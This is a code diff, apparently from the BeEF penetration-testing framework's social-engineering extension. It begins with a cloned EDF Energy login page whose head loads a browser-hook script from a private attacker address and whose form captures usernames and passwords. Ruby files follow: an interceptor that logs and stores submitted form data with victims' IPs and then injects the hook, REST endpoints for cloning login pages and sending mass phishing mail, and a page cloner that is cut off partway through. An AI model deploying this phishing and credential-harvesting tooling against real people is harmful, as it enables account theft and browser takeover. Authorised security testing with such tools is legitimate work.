</script><script>frameworkSupport.init({anonymous:true,phase:'framework',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous'});</script><script>frameworkSupport.init2({contentAreaURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage!2fcom.sap.portal.contentarea',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous',innerPage:'pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.sap.portal.innerpage',innerPageFrameURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage',tlnComp:'/irj/portalapps/com.sap.portal.navigation.toplevel',ObjBasedNavigationURL:'/irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.objbased.ObjBasedNavigation',serverPath:'https://my-account.edfenergy.com:443',usedConnectors:''});</script>
<span id=divChangeContent name=divChangeContent style="position:absolute;height:0;width:0;top:-5000;left:-5000">
<FORM action="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com" method=POST id="frmChangeContent" name="frmChangeContent">
<INPUT type="hidden" id=NavigationTarget name=NavigationTarget>
<INPUT type="hidden" id=RelativeNavBase name=RelativeNavBase></INPUT>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUhgPrZWDRw08VLuhthw6Alf_ythxgZRxx-bn2SU9GjY2G8UFdotsliPfe5ArbcVEM="></FORM>
<form id='obnNavForm' method='post' target='obnNavIFrame' action="/irj/portal/anonymous"> <input type='hidden' name='systemAlias'>
<input type='hidden' name='businessObjName'>
<input type='hidden' name='objValue'>
<input type='hidden' name='operation'>
<input type='hidden' name='usePost' value='false'>
<input type='hidden' name='source'>
<input type='hidden' name='resolvingMode' value='Default'>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUZncgeJn0nDtoKgRZLTHoNG9b8gjXLxyg1JXcdz0DDEk4i74Lypj65OK5A4udLxsoXWiF7rrPTfgID-qUNr8-D6aXCTTHzGtpGEifQUi875Ykz1XmE69Xx"></form>
</span>
<iframe src='https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html' style='position:absolute;height:0;visibility:hidden' name='obnNavIFrame' id='obnNavIFrame'></iframe>
<script>var disablePersonalize = true;</script>
<!-- EPCF: Component com.sap.portal.pagebuilder.pageBuilder, agnkfkoliedeidmfenendpdjjggfpmic -->
<SCRIPT>var emptyDocumentUrl = "/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html";</SCRIPT>
<!-- EPCF: Component com.sap.portal.layouts.framework.light_framework, fbkobmdfenlemkgnkdbnmfdjjggfpmip -->
<SCRIPT>if (typeof EPCM != "undefined") {EPCM.relaxDocumentDomain();} else { var d=document.domain; if (d.search(/^\d+\.\d+\.\d+\.\d+$/)>=0) {} else { var l=d.indexOf("."); if (l>=0) {d=d.substr(l+1)} } if (document.domain != d) {document.domain = d;}}
pageSupport.pageHelperUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.PageHelper';
pageSupport.proxyModesUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.IviewModeProxy';
pageSupport.addPageId('pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg','0','local');
pageSupport._addIvuPageId("pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.edfe.orchard.pct.Logon_ivu","page0ivu0");
pageSupport._addIViewBank("page0ivu0",new iviewBank("","",pageSupport.EMBEDDED,1,"0","","GET"));
</SCRIPT>
<script>
document.body.style.margin=0;
document.body.scroll = "no";
</script>
<TABLE style="WIDTH: 100%" cellSpacing=0 cellPadding=0 class="prtlHeaderCon" ><TR><TD>
<!-- EPCF: Component com.edfe.orchard.Logon.LogonComp, fchmhdeefnpeknleddanfldjjggfpmig -->
<html xmlns:xalan-nodeset="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content="HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<title>MyAccount</title>
<link rel="SHORTCUT ICON" href="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/favicon/favicon.ico" />
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/edfenergy-ga-script-n.js"></script>
<script type="text/javascript">
loadTrackCode('UA-25608035-1');
_gaq.push(['_trackPageview', 'Login']);
</script>
<script language="JavaScript">
/*var emailRegEx = /^([a-zA-Z0-9_\.\!\#\$\%\^\&\*\{\}\~\`\+\_\=\?\'\|\"\-]{2,})\@(([a-zA-Z0-9\-]{2,})\.)+([a-zA-Z]{2,4})+$/;*/
var emailRegEx = /^\s*[\w\-\+_\{\}\~\`\+\_\=\?\'\|\"\-\!\#\$\%\^\&\*]+(\.[\w\-\+_\']+)*\@[\w\-\+_]+\.[\w\-\+_]+(\.[\w\-\+_]+)*\s*$/;
var Monitor_Flag1 = true;
document.onkeyup = checkKeyPressed;
window.history.forward(1);
function EDFEDisableSubmitButton1( button_text1, button_id1 )
{
var bid = button_id1;
var btext = button_text1;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
function checkCode()
{
if(event.keyCode==13)
{
event.keyCode=9;
}
}
function checkKeyPressed()
{
if(event.keyCode==13)
{
if(Monitor_Flag1!=null && Monitor_Flag1==true){
callGA('yes');
}
else
{
callGA('no');
}
}
}
function change(param1,param2)
{
param1.style.backgroundColor = param2;
}
function allValidChars(email)
{
var parsed = true;
var validchars = "abcdefghijklmnopqrstuvwxyz0123456789@.-_!#$%&`*+-/=?^'{}|~\"";
for (var i=0; i < email.length; i++)
{
var letter = email.charAt(i).toLowerCase();
if (validchars.indexOf(letter) != -1)
continue;
parsed = false;
break;
}
return parsed;
}
function trim(str) {
return str.replace(/(^[\s\xA0]+|[\s\xA0]+$)/g, '');
}
function validateEmail(email)
{
var decision = true;
if(trim(email)!= null && trim(email) !=""){
if(email.match(emailRegEx)){
decision = true;
}else{
decision = false;
}
}else{
decision = false;
}
/*
if (! allValidChars(email))
{
decision = false;
}
if (email.indexOf("@") < 1)
{
decision = false;
}
if(email.indexOf("@")!=email.lastIndexOf("@"))
{
decision = false;
}
else if (email.lastIndexOf(".") <= email.indexOf("@"))
{
decision = false;
}
else if (email.indexOf("@") == email.length)
{
decision = false;
}
else if (email.indexOf("..") >=0)
{
decision = false;
}
else if (email.indexOf(".") == email.length)
{
decision = false;
}*/
if(!decision)
{
document.logonForm.f_username.focus();
change(document.logonForm.f_username,'#FFFFFF'); // Cosmotic Changes
document.getElementById('errorMessage').innerHTML = "Please enter a valid email address";
document.getElementById('errorMessage1').innerHTML = "";
}
else
{
change(document.logonForm.f_username,'#FFFFFF');
}
return decision;
}
function callGA(GA)
{
if(GA!=null && GA=="yes")
{
_gaq.push(['_trackPageview', 'LoginAttempted']);
}
var t = setTimeout("validateLogin()", 100);
}
function validateLogin()
{
var email = document.logonForm.f_username.value;
var pass = document.logonForm.f_passwd.value;
if(email==null || email=="")
{
document.logonForm.f_username.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your 'username', which is your email address";
document.getElementById('errorMessage1').innerHTML = "";
return false;
}
else
{
if(validateEmail(email))
{
if(pass==null || pass=='')
{
document.logonForm.f_passwd.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your password";
document.getElementById('errorMessage1').innerHTML = "";
change(document.logonForm.f_passwd,'#FFFFFF');
return false;
}
else
{
change(document.logonForm.f_passwd,'#FFFFFF');
document.logonForm.action = "/nclogin.submit";
EDFEDisableSubmitButton1('Login','EDFElogonButton');
document.logonForm.submit();
}
}
}
}
function validateFU()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController";
document.logonForm.submit();
}
function validateFP()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp";
document.logonForm.submit();
}
function validateRegisterSME()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=SME";
document.logonForm.submit();
}
function validateRegisterResi()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=RESI";
document.logonForm.submit();
}
function validateMR()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller";
document.logonForm.submit();
}
</script>
<script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head>
<body onLoad="history.forward(); document.logonForm.f_username.focus();">
<div id="wrap">
<div id="outer-right">
<div id="outer">
<!--------------------------- start top section ----------------------------------->
<script>
function performSearch()
{
var searchItem = document.getElementById('searchBox');
window.open('http://www.edfenergy.com/search-results.php?query='+searchItem.value,'_blank');
}
function clearText()
{
document.getElementById('searchBox').value="";
}
function EDFEDisableSubmitButton( button_text, button_id )
{
var bid = button_id;
var btext = button_text;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
</script>
<!--------------------------- start top section ----------------------------------->
<div id="header">
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#pnav">skip to primary navigation</a>
</p>
<div id='logo'>
<img src='https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/edfenergy_logo2.gif' title='EDF Energy' alt='EDF Energy' width='56' height='89' border='0' />
</div><!-- start top utilities -->
<div id="toplinks">
<div class="left">
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">Home</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">MyAccount</a></li>
<li><a href="https://my-account.edfenergy.com/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller">My meter reading</a></li>
</ul>
</div>
<div class="right">
<ul>
<li><a href="http://www.edf.com" target="_blank">EDF Group</a></li>
</ul>
<div id="searchform">
<form name="SearchForm" id="SearchForm" action="/irj/portal/anonymous"> <input name="searchBox" id="searchBox" type="text" value="Search" class="searchtextbox" onfocus="clearText()" />
<input name="searchSubmit" type="image" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/search-icon.png" title="Perform Search" class="faq-button" onclick="performSearch(); return false;" />
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWulwL539YlRxugW3Unfla8YtGvDKb-X_2YFxvNDTOZUB0qVQVl6ZXF"></form>
</div>
</div>
</div>
<div id="olympiclogo">
<img src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/london2012_logo_new.gif" alt="London 2012 Official Electricity Supplier" title="London 2012 Official Electricity Supplier" />
</div><!-- end top utilities -->
<!-- start top navigation -->
<div id="topnav">
<div id="topnav-inner">
<p class="hide-element">
<a name="pnav" id="pnav">primary navigation</a>
</p>
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#snav">skip to secondary navigation</a>
</p>
<ul>
<li>
<a target="_blank" href="https://www.edfenergy.com/products-services/index.shtml" >Products &amp; Services</a>
</li>
<li>
<a target="_blank" href="http://www.edfenergy.com/energyfuture">Energy Future</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/about-us/index.shtml">About us</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/sustainability/index.shtml">Sustainability</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/careers/index.shtml">Careers</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/media-centre/index.shtml">Media centre</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/safety-emergencies/index.shtml">Safety &amp; emergencies</a>
</li>
</ul>
<div class="clearFix"></div>
</div>
</div><!-- end top navigation -->
</div>
<!--------------------------- end top section ----------------------------------->
<!--------------------------- end top section ----------------------------------->
<div id="pagehold">
<!--------------------------- start left section ----------------------------------->
<SCRIPT>
function fnNavigateMenu(locationURL,navigParam,menuIden)
{
if (navigParam == 'false')
{
document.outsidemenu.menuidentifier.value = menuIden ;
document.outsidemenu.action = locationURL ;
document.outsidemenu.submit() ;
}
else
{
window.open(locationURL) ;
}
}
</SCRIPT>
<!-- start left section forgottenusername.html;forgottenpassword.html -->
<div id="leftnav-outer">
<div id="leftnav">
<ul>
<li><ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller','false','EMR')" >Submit meter reading</a></ul></li>
<li>
<ul>
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('http://www.edfenergy.com/contact-us/index.shtml','true','CONTACTUS')">Contact us</a>
</ul>
</li>
<li>
<ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="current" onClick="fnNavigateMenu('/irj/portal/anonymous','false','LOGON')" >Login / Register</a>
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController','false','FUN')" >Forgotten your username</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp','false','FUP')" >Forgotten your password</a></li>
</ul>
</ul>
</li>
</ul>
<ul>
<br/><br/>
<div id="lpButtonDiv" align="center">
</div>
</ul>
</div>
</div>
<!-- end left section -->
<form name="outsidemenu" method="POST" action="/irj/portal/anonymous"> <input type="hidden" name="menuidentifier" value="">
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWqJ6R7zZUHhDE15UF2cpEumhm0TWuQDLfNnOD8MqMtjNF30GgZOV1f"></form>
<!--------------------------- end left section ----------------------------------->
<!--------------------------- start middle section ----------------------------------->
<div id="maincontent-wrap" class="fullwidth">
<p class="hide-element">
<a name="cont" id="cont">main content</a>
</p>
<div id="maincontent-full" class="nobanner">
<div id="banner" class="BannerWith2Circles">
<h1>
Login / Register
</h1>
<div id="banner_text_wrap">
<img alt="" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/banners/my-account.jpg" />
<div id="banner_text">
<p>
&nbsp;<br />&nbsp;<br />Login or register<br />to access your<br />
energy account online<br />&nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;
</p>
</div>
</div>
</div>
<div id="two-col-wrap" class="two_col_wrap_bg">
<div id="content" class="make-full">
<div id="data">
<div id="leftcolumn">
<h2>Login to MyAccount</h2>
<!-- Prototype Builder Start srm::-->
<form name="logonForm" method="post" action="/irj/portal/anonymous">
<span class="legacymessage">
</span>
<span class="legacymessage">
</span>
<span class="warningmessage" id="errorMessage"></span><BR/>
<span class="warningmessage" id="errorMessage1"></span>
<input type ="hidden" name = "f_method" value = "LOGIN" />
<table class="formfields" border="1" summary="Visual Layout for the login form">
<tbody>
<tr>
<th><label for="f_username">Username (email address)<em>*</em></label></th><td>
<input id="f_username" name="f_username" type="text" size="27" maxlength="241" tabindex="1" value=""/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_username"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter your username</SPAN></A>
</td>
</tr>
<tr>
<th><label for="f_passwd">Password<em>*</em></label></th><td>
<input id="f_passwd" name="f_passwd" type="Password" size="18" maxlength="16" tabindex="2" autocomplete=OFF/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_passwd"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter the password for this account</SPAN></A>
</td>
</tr>
</tbody>
</table>
<input type="submit" value="Login" style="background:#FE5815;color:white!important;heigth:6em;width:7em;font-size:14px;font-family:arial;font-weight:500;margin:0px;padding-left:15px;padding-right:15px;padding-top:7px;padding-bottom:7px;border:none;cursor:pointer">
<br /><br /><br />
<p>Forgotten your <a href="javaScript:validateFU();">username</a> or <a href="javaScript:validateFP();">password</a>?</p>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUN7mVuDM1dmcrQChOQXirPHBYBwncOB_h5_QMzu8x_5eBlZcqXpqJKJuOtpQFlZPpXFhCbOjTPxw=="></form>
<!-- Prototype Builder End -->
</div>
<div id="rightcolumn">
<h2>Register Today!</h2>
<p>&nbsp;</p>
<ul>
<li class="tick"> View and pay your bills</li>
<li class="tick"> Submit your meter reading</li>
<li class="tick"> Update your details</li>
<li class="tick"> Sign up for Direct Debit</li>
</ul><br/>
<table border=0><tr>
<td>
<div class="btbu" id="registerButtonResi"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterResi();" class="">Register your<br> home &raquo;</a></div>
</td><td>
&nbsp;&nbsp;&nbsp;</td>
<td> <div class="btbu" id="registerButtonSME"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterSME();" class="">Register your<br> business &raquo;</a></div>
</td></tr>
</table>
<br/>
<p><strong>Don't have an online account?</strong><br/>You can still <a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateMR();">submit a meter reading</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
<!--------------------------- end middle section ----------------------------------->
</div><!--pagehold-->
<!--------------------------- start bottom section ----------------------------------->
<script type="text/javascript">
var __stormJs = 't1.stormiq.com/dcv4/jslib/3171_71E90107_6FC7_48DB_B3F5_713D754C9B89.js';
</script>
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/track.js"></script>
<script type="text/javascript">
function TermsAndConditions()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=TermsAndConditions.htm","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=tnc";
}
function PrivacyPolicy()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=Privacy.html","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=privacy";
}
// Removes leading whitespaces
function LTrim( value ) {
var re = /\s*((\S+\s*)*)/;
return value.replace(re, "$1");
}
// Removes ending whitespaces
function RTrim( value ) {
var re = /((\s*\S+)*)\s*/;
return value.replace(re, "$1");
}
// Removes leading and ending whitespaces
function trim( value ) {
return LTrim(RTrim(value));
}
</script>
<!-- start bottom section -->
<div id="footer">
<ul>
<li>
<a href="javascript:TermsAndConditions();">Terms &amp; conditions</a>
</li>
<li>
<a href="javascript:PrivacyPolicy();">Privacy</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/accessibility.shtml" target="_blank">Accessibility</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/copyright.shtml" target="_blank">Copyright statement</a>
</li>
<li class="last">
<a href="http://www.edfenergy.com/products-services/fuel-mix.shtml" target="_blank">Our fuel mix</a>
</li>
</ul>
<p class="copy"> &copy; EDF Energy 2012 All rights reserved</p>
<p class = "cookiePolicy">By continuing to use this site, you agree to our <a target="_blank" href="http://www.edfenergy.com/about-us/cookies/cookie-policy.shtml" style = "text-decoration:underline; color: #fff">Cookie Policy</a>.If you don't agree to Cookies<br>being stored on your computer in line with that policy please navigate away from this site.</p>
</div>
<!-- end bottom section -->
<SCRIPT>
document.body.scroll = "";
</SCRIPT>
<!--------------------------- end bottom section ----------------------------------->
</div><!--outer-->
</div>
</div><!--wrap-->
</body>
</html>
</TD></TR></TABLE>
</body></html>

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.9 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 864 B

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.5 KiB

35
extensions/social_engineering/models/interceptor.rb Normal file
View File

@@ -0,0 +1,35 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
class Interceptor
include DataMapper::Resource
storage_names[:default] = 'extension_seng_interceptor'
property :id, Serial
property :ip, Text, :lazy => false
property :post_data, Text, :lazy => false
belongs_to :webcloner
end
end
end
end

33
extensions/social_engineering/models/mass_mailer.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
class Massmailer
include DataMapper::Resource
storage_names[:default] = 'extension_seng_massmailer'
property :id, Serial
#todo fields
end
end
end
end

36
extensions/social_engineering/models/web_cloner.rb Normal file
View File

@@ -0,0 +1,36 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
class Webcloner
include DataMapper::Resource
storage_names[:default] = 'extension_seng_webcloner'
property :id, Serial
property :uri, Text, :lazy => false
property :mount, Text, :lazy => false
has n, :extension_seng_interceptor, 'Interceptor'
end
end
end
end

131
extensions/social_engineering/rest/socialengineering.rb Normal file
View File

@@ -0,0 +1,131 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
class SEngRest < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
#Example: curl -H "Content-Type: application/json; charset=UTF-8"
#-d '{"url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=
#https://mail.google.com/mail/&ss=1&scc=1&ltmpl=default&ltmplcache=2", "mount":"/url"}'
#-X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7
post '/clone_page' do
request.body.rewind
begin
body = JSON.parse request.body.read
uri = body["url"]
mount = body["mount"]
use_existing = body["use_existing"]
if uri != nil && mount != nil
if (uri =~ URI::regexp).nil? #invalid URI
print_error "Invalid URI"
halt 401
end
if !mount[/^\//] # mount needs to start with /
print_error "Invalid mount (need to be a relative path, and start with / )"
halt 401
end
web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
success = web_cloner.clone_page(uri,mount,use_existing)
if success
result = {
"success" => true,
"mount" => mount
}.to_json
else
result = {
"success" => false
}.to_json
end
end
rescue Exception => e
print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
error 400 # Bad Request
end
end
# Example: curl -H "Content-Type: application/json; charset=UTF-8" -d 'json_body'
#-X POST http://127.0.0.1:3000/api/seng/send_mails?token=68f76c383709414f647eb4ba8448370453dd68b7
# Example json_body:
#{
# "template": "default",
# "subject": "Hi from BeEF",
# "fromname": "BeEF",
# "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
# "linktext": "http://beefproject.com",
# "recipients": [{
# "user1@gmail.com": "Michele",
# "user2@antisnatchor.com": "Antisnatchor"
#}]
#}
post '/send_mails' do
request.body.rewind
begin
body = JSON.parse request.body.read
template = body["template"]
subject = body["subject"]
fromname = body["fromname"]
link = body["link"]
linktext = body["linktext"]
if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
print_error "All parameters are mandatory."
halt 401
end
if (link =~ URI::regexp).nil?#invalid URI
print_error "Invalid link or linktext"
halt 401
end
recipients = body["recipients"][0]
recipients.each do |email,name|
if !/\b[A-Z0-9._%a-z\-]+@(?:[A-Z0-9a-z\-]+\.)+[A-Za-z]{2,4}\z/.match(email) || name.nil?
print_error "Email [#{email}] or name [#{name}] are not valid/null."
halt 401
end
end
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
rescue Exception => e
print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
error 400
end
end
end
end
end
end

61
extensions/social_engineering/web_cloner/interceptor.rb Normal file
View File

@@ -0,0 +1,61 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
require 'sinatra/base'
class Interceptor < Sinatra::Base
configure do
set :show_exceptions, false
end
# intercept GET
get "/" do
print_info "GET request from IP #{request.ip}"
print_info "Referer: #{request.referer}"
cloned_page = settings.cloned_page
cloned_page
end
# intercept POST
post "/" do
print_info "POST request from IP #{request.ip}"
request.body.rewind
data = request.body.read
print_info "Intercepted data:"
print_info data
interceptor_db = BeEF::Core::Models::Interceptor.new(
:webcloner_id => settings.db_entry.id,
:post_data => data,
:ip => request.ip
)
interceptor_db.save
if settings.frameable
print_info "Page can be framed :-) Loading original URL into iFrame..."
"<html><head><script type=\"text/javascript\" src=\"#{settings.beef_hook}\"></script>\n</head></head><body><iframe src=\"#{settings.redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
else
print_info "Page can not be framed :-) Redirecting to original URL..."
redirect settings.redirect_to
end
end
end
end
end
end

178
extensions/social_engineering/web_cloner/web_cloner.rb Normal file
View File

@@ -0,0 +1,178 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
class WebCloner
include Singleton
def initialize
@http_server = BeEF::Core::Server.instance
@config = BeEF::Core::Configuration.instance
@cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
@beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
end
def clone_page(url, mount, use_existing)
print_info "Cloning page at URL #{url}"
uri = URI(url)
output = uri.host
output_mod = "#{output}_mod"
user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
